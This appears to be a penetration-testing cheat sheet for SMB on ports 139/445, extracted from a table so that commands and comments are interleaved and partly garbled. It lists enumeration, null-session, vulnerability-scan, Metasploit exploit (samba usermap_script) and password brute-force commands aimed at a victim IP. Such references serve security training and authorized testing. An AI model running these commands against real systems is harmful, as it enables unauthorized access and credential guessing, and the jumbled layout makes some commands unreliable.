SMB - 139/445

Categories OS Tool Intent Command Comments

nmblookup -A <victim_ip>
139/445 - smb Linux nmblookup Enumerate hostname

enum4linux -n <victim_ip> Versions Samba 2.2.x are red flag

139/445 - smb Linux enum4linux Enumerate hostname

$ nmap --script=smb-enum* --script-

Linux / args=unsafe=1 -T5 <victim_ip>
139/445 - smb nmap Quick Enumeration
Windows
[Link] <victim_ip> Script used to get smb version if nmap
139/445 - smb Linux smbver script get version fails

Msfconsole;use scanner/smb/smb_version metasploit modele to get smb version

139/445 - smb Linux Metasploit get version

ngrep -i -d tap0 's.?a.?m.?b.?a.*[[: Manual method to get version if all else

139/445 - smb Linux ngrep get version digit:]]' fails
smbclient -L \\\\<victim_ip>
#1:run Wireshark noted by 1kwstassak in [Link]
linux / #2:smbmap -H <victim_ip>
139/445 - smb wireshark get version
windows #3:follow the tcp stream of the smb
negotiation
smbmap -H <victim_ip> -R <sharename>
139/445 - smb linux smbmap get shares Recursively display files in specific
share
echo exit | smbclient -L \\\\$ip
139/445 – smb linux smbclient get shares

smbclient \\\\<victim_ip>\\<share> more details in cherrytree file (1.

139/445 - smb linux smbclient get shares information gathering > Active >
Enumeration > Services > [Link])
smbclient -L //<victim_ip> -N -N Force the tool to not ask for password
139/445 – smb linux smbclient get shares

Linux / nmap --script smb-enum-shares -p139,445 -

139/445 - smb nmap get shares T4 -Pn <victim_ip>
Windows
smbclient -L \\\\<victim_ip>\\ more details in cherrytree file (1.
139/445 - smb linux smbclient get shares information gathering > Active >
Enumeration > Services > [Link])
smbmap -H <victim_ip> vulnerable version :
Windows NT, 2000, and XP (most SMB1) -
VULNERABLE: Null Sessions can be created
by default
139/445 - smb linux smbmap Check Null Sessions Windows 2003, and XP SP2 onwards - NOT
VULNERABLE: Null Sessions can't be created
default
Most Samba (Unix) servers
rpcclient -U "" -N $ip
139/445 – smb linux rpcclient Check Null Sessions

smbclient //<victim_ip>/IPC$ -N Success #:/smb>

139/445 – smb linux smbclient Check Null Sessions

enum -s <victim_ip> enumerate the shares of a machine

139/445 – smb linux enum Exploit null Sessions

enum -U <victim_ip> -U enumerate usersA133:AMJ133

139/445 – smb linux enum Exploit null Sessions

enum -P <victim_ip> -P check the password policy

139/445 – smb linux enum Exploit null Sessions

enum4linux -a <victim_ip> enum4linux -a (use all enum switches

139/445 – smb linux enum4linux Exploit null Sessions useres/shares/password policies)
using /usr/share/doc/python3-
impacket/examples/[Link]
139/445 – smb linux [Link] Exploit null Sessions #./[Link] <victim_ip>

connect to Username $ smbclient //$ip/share -U username this step required u have a cred
139/445 - smb linux smbclient
shares
smbclient \\\\<victim_ip>\\<share> more details in cherrytree file (1.
information gathering > Active >
connect to share Enumeration > Services > [Link])
139/445 - smb linux smbclient
Anonymously Example : smbclient \\\\<victim_ip>\\IPC$

smbclient //<victim_ip>/<share>
connect to share
139/445 - smb linux smbclient
Anonymously
smbclient //<victim_ip>/<share\ name> If share has a space inbetween its name
connect to share smbclient //<victim_ip>/<"share name"> (eg. "My Shares")
139/445 - smb linux smbclient
Anonymously

rpcclient -U " " <victim_ip> Connect to null share which is the IPC$
connect to share share, enumerate with specifc commands,
139/445 - smb linux rpcclient
Anonymously refer to onenote

rpcclient -U " " -N <victim_ip> Connect to null share which is the IPC$
connect to share share, enumerate with specifc commands,
139/445 - smb linux rpcclient
Anonymously refer to onenote

nmap --script smb-vuln* -p139,445 -T4 -Pn

linux /
139/445 – smb nmap check vuln <victim_ip>
Windows
 #msf> resource smb_checks.rc # This resource scripts will check common
Or security concerns on SMB for Windows.
# msfconsole -r /usr/share/metasploit- # Specifically, this script will check for
Linux / check common security framwork/scripts/resource/smb_checks.rc these things: #
139/445 – smb Metasploit # * MS08-067.
Windows concerns
# * MS17-010.
# * SMB version 1. #

#msf> resource smb_validate.rc after running the previous check

Or
Linux / # msfconsole -r /usr/share/metasploit-
139/445 – smb Metasploit extra validation
Windows framwork/scripts/resource/smb_validate.rc

msfconsole; use
Linux / exploit/multi/samba/usermap_script; set
139/445 – smb Metasploit multi exploits
Windows lhost 192.168.0.X; set rhost $ip; run
after enumerating users u can brute force
login
#medusa -h <victim_ip> -u userhere -P
/usr/share/seclists/Passwords/Common-
Credentials/[Link] -M smbnt
#nmap -p445 --script smb-brute --script-
139/445 – smb linux nmap/medusa Brute Force login args userdb=userfilehere,
passdb=/usr/share/seclists/Passwords/Commo
n-Credentials/10-million-password-list-
[Link] <victim_ip> -vvvv
#nmap –script smb-brute <victim_ip>